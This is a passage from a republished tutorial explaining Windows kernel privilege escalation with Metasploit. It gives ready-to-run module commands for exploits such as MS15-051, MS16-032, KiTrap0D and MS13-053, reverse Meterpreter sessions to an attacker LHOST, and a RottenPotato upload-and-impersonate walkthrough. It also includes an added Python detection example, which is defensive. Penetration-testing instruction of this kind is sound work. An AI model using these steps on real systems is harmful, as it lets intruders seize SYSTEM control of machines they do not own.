2025-04-13 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/02 Report
Many beginners are unclear about how Windows kernel vulnerabilities are used for privilege escalation. To help with that, this article explains the process in detail; anyone who needs it is welcome to read along, and I hope you gain something from it.
Continuing from "Using automated scripts to elevate Windows rights", this article introduces privilege escalation through Windows kernel vulnerabilities. I will use Metasploit's built-in modules for the demonstration.
Windows-Exploit-suggester
Metasploit's built-in local_exploit_suggester module enumerates the local privilege-escalation exploits available in the framework and recommends candidates based on the architecture, the platform (the operating system in use), the session type, and the required default options. This saves a lot of time and the hassle of searching for local exploits by hand. That said, not every listed local exploit will actually work. The best approach, whether the goal is exploitation or simply finding the right path, is to combine the automated suggestions with manual verification.
Usage
Note: local_exploit_suggester requires an existing Meterpreter session on the target machine. Before running it, send the current Meterpreter session to the background (Ctrl+Z).
For example, suppose we already have Meterpreter session 1:
use post/multi/recon/local_exploit_suggester
set LHOST 192.168.1.107
set SESSION 1
exploit
As shown in the following figure, it automatically matches some possible exploit modules for vulnerable targets.
Windows ClientCopyImage Win32k Exploit
This is a privilege-escalation vulnerability in a Windows kernel-mode driver. The module exploits incorrect object handling in the win32k.sys kernel-mode driver to elevate privileges.
The module has been tested on vulnerable versions of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.
Let's go to the MSF console and execute the exploit module for this vulnerability
use exploit/windows/local/ms15_051_client_copy_image
set lhost 192.168.1.107
set session 1
exploit
Once the exploit is successfully executed, another Meterpreter session will be opened
getsystem
getuid
As you can see, our current user privileges have been elevated to NT AUTHORITY\SYSTEM.
Windows TrackPopupMenu Win32k NULL pointer dereference
This module exploits a NULL pointer dereference in win32k.sys that can be triggered through the TrackPopupMenu function. Under specific conditions, the NULL pointer dereference in xxxSendMessageTimeout can be abused to achieve arbitrary code execution.
The module has been tested on Windows XP SP3, Windows Server 2003 SP2, Windows 7 SP1, Windows Server 2008 32-bit and Windows Server 2008 R2 SP1 64-bit.
Let's go to the MSF console and execute the exploit module for this vulnerability
use exploit/windows/local/ms14_058_track_popup_menu
set lhost 192.168.1.107
set session 1
exploit
Once the exploit is successfully executed, another Meterpreter session will be opened
getsystem
getuid
As you can see, our current user privileges have been elevated to NT AUTHORITY\SYSTEM.
Elevate Windows permissions through KiTrap0D
This module creates a new session with SYSTEM privileges through the KiTrap0D exploit; it will not run if the current session is already elevated. The module depends on kitrap0d.x86.dll and is therefore not supported on x64 versions of Windows.
The module has been tested on vulnerable 32-bit versions of Windows Server 2003, Server 2008, Windows 7 and XP.
Let's go to the MSF console and execute the exploit module for this vulnerability
use exploit/windows/local/ms10_015_kitrap0d
set lhost 192.168.1.107
set session 1
exploit
Once the exploit is successfully executed, another Meterpreter session will be opened
getsystem
getuid
As you can see, our current user privileges have been elevated to NT AUTHORITY\SYSTEM.
Task Scheduler XML privilege escalation
This vulnerability lies in the Task Scheduler and may allow a user to escalate privileges. If an attacker logs on to an affected system and runs a specially crafted application, the vulnerability can lead to privilege escalation. The attacker must hold valid logon credentials and be able to log on locally; remote or anonymous users cannot exploit it.
The module has been tested on vulnerable versions of Windows Vista, Windows 7 and Windows Server 2008, x64 and x86.
Let's go to the MSF console and execute the exploit module for this vulnerability
use exploit/windows/local/ms10_092_schelevator
set lhost 192.168.1.107
set session 1
exploit
Once the exploit is successfully executed, another Meterpreter session will be opened
getsystem
getuid
As you can see, our current user privileges have been elevated to NT AUTHORITY\SYSTEM.
MS16-016 mrxdav.sys WebDAV local privilege escalation
This module exploits a vulnerability in mrxdav.sys. It spawns a process on the target system and elevates it to NT AUTHORITY\SYSTEM before executing the payload.
The module has been tested on a vulnerable version of Windows 7 SP1 x86.
Let's go to the MSF console and execute the exploit module for this vulnerability
use exploit/windows/local/ms16_016_webdav
set lhost 192.168.1.107
set session 1
exploit
Once the exploit is successfully executed, another Meterpreter session will be opened
getsystem
getuid
As you can see, our current user privileges have been elevated to NT AUTHORITY\SYSTEM.
EPATHOBJ::pprFlattenRec local privilege escalation
This module exploits a vulnerability in EPATHOBJ::pprFlattenRec whose root cause is the use of uninitialized data, which leads to memory corruption.
At present the module has been tested successfully on Windows XP SP3, Windows 2003 SP1 and Windows 7 SP1.
Let's go to the MSF console and execute the exploit module for this vulnerability
use exploit/windows/local/ppr_flatten_rec
set lhost 192.168.1.107
set session 1
exploit
Once the exploit is successfully executed, another Meterpreter session will be opened
getsystem
getuid
As you can see, our current user privileges have been elevated to NT AUTHORITY\SYSTEM.
MS13-053: NTUserMessageCall Win32k kernel pool overflow
A kernel pool overflow in Win32k allows a local user to escalate privileges. The kernel shellcode sets the ACL of the winlogon.exe process (a SYSTEM process) to NULL, which lets any unprivileged process migrate into winlogon.exe and thereby gain elevated privileges. Note: exiting the Meterpreter session may crash winlogon.exe.
Currently, the module has been successfully tested on Windows 7 SP1 x86.
Let's go to the MSF console and execute the exploit module for this vulnerability
use exploit/windows/local/ms13_053_schlamperei
set lhost 192.168.1.107
set session 1
exploit
Once the exploit is successfully executed, another Meterpreter session will be opened
getsystem
getuid
As you can see, our current user privileges have been elevated to NT AUTHORITY\SYSTEM.
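From the defender's side, the two observable effects described above are worth alerting on: a remote thread created in winlogon.exe by a process that is not running as SYSTEM (the migration step of the MS13-053 module), and a process running as NT AUTHORITY\SYSTEM whose parent is not SYSTEM (the new SYSTEM session every module in this article spawns). The following detection logic is an added example, not code from the article or from Metasploit; the event records are constructed and their field names are an assumption of this example, loosely modelled on Sysmon event IDs 1 (process create) and 8 (CreateRemoteThread).

```python
# Added example: flag the post-exploitation signals discussed on this page.
# Records are constructed sample data; field names are assumed for this example.
SYSTEM = r"NT AUTHORITY\SYSTEM"

SAMPLE_EVENTS = [  # constructed sample data, not real telemetry
    {"id": 1, "image": r"C:\Windows\explorer.exe", "user": r"CORP\alice",
     "parent_image": r"C:\Windows\System32\userinit.exe", "parent_user": r"CORP\alice"},
    # remote thread into winlogon.exe from a low-privilege process (MS13-053 pattern)
    {"id": 8, "source_image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "source_user": r"CORP\alice", "target_image": r"C:\Windows\System32\winlogon.exe"},
    # SYSTEM payload spawned by a non-SYSTEM parent (new elevated session pattern)
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe", "user": SYSTEM,
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\svc.exe", "parent_user": r"CORP\alice"},
    # benign: services.exe (SYSTEM) starting a service host
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe", "user": SYSTEM,
     "parent_image": r"C:\Windows\System32\services.exe", "parent_user": SYSTEM},
]


def _basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return a list of alert strings for one event (empty when nothing matches)."""
    alerts = []
    if (ev["id"] == 8 and _basename(ev["target_image"]) == "winlogon.exe"
            and ev["source_user"].upper() != SYSTEM):
        alerts.append(f"remote thread into winlogon.exe from {ev['source_image']} "
                      f"running as {ev['source_user']}")
    if (ev["id"] == 1 and ev["user"].upper() == SYSTEM
            and ev["parent_user"].upper() != SYSTEM):
        alerts.append(f"SYSTEM process {ev['image']} spawned by {ev['parent_image']} "
                      f"running as {ev['parent_user']}")
    return alerts


def scan(events):
    """Run check_event over a list of records and collect all alerts."""
    return [alert for ev in events for alert in check_event(ev)]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Baseline the second rule against legitimate administrative tooling in your environment before alerting on it, since some management agents also launch SYSTEM processes from non-SYSTEM parents.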
MS16-032 Secondary Logon Handle privilege escalation
This module exploits the lack of standard-handle sanitization in the Windows Secondary Logon Service. The vulnerability affects 32- and 64-bit versions of Windows 7-10 and 2k8-2k12. The module only works on Windows systems with PowerShell 2.0 or later and at least two CPU cores.
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
exploit
Once the exploit is successfully executed, another Meterpreter session will be opened
getsystem
getuid
As you can see, our current user privileges have been elevated to NT AUTHORITY\SYSTEM.
RottenPotato
Use RottenPotato to locally elevate the service account to SYSTEM.
First, we use the following commands in the Meterpreter session to check whether any usable tokens exist on the current system.
load incognito
list_tokens -u
As you can see, there is currently no token available.
Now let's download RottenPotato from GitHub.
git clone https://github.com/foxglovesec/RottenPotato.git
cd RottenPotato
When the download is complete, there is a rottenpotato.exe file in the RottenPotato directory.
Upload the file to the victim machine.
upload /root/Desktop/RottenPotato/rottenpotato.exe
Then type the following commands to run the executable, which adds a SYSTEM token to the impersonation tokens, and impersonate it.
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
As you can see, our current user privileges have been elevated to NT AUTHORITY\SYSTEM.